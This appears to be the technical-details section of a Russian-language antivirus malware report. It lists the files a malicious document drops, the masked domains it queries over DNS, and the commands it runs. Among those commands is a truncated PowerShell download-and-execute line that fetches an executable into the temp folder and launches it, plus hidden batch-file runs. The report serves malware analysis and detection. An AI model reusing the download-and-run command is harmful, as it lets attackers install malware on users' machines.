Техническая информация
- $lcwaoucwcjv как %temp%\cmclnsr.exe
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function Qpqqnxqffadv([String] $lcwaoucwcjv){(New-Object System.Net.WebClient).DownloadFile($lcwaoucwcjv,''%TMP%\Cmclnsr.exe'');Start-Process ''%TMP%\Cmclnsr.exe'';...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1296
- %HOMEPATH%\application data\microsoft\forms\winword.box
- %TEMP%\swdavfzama3.bat
- %TEMP%\995395.cvr
- DNS ASK 6-###ress.ch
- DNS ASK tr#####ha-dinnie.co.uk
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function Qpqqnxqffadv([String] $lcwaoucwcjv){(New-Object System.Net.WebClient).DownloadFile($lcwaoucwcjv,''%TMP%\Cmclnsr.exe'');Start-Process ''%TMP%\Cmclnsr.exe'';...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\Swdavfzama3.bat" "' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\Swdavfzama3.bat" "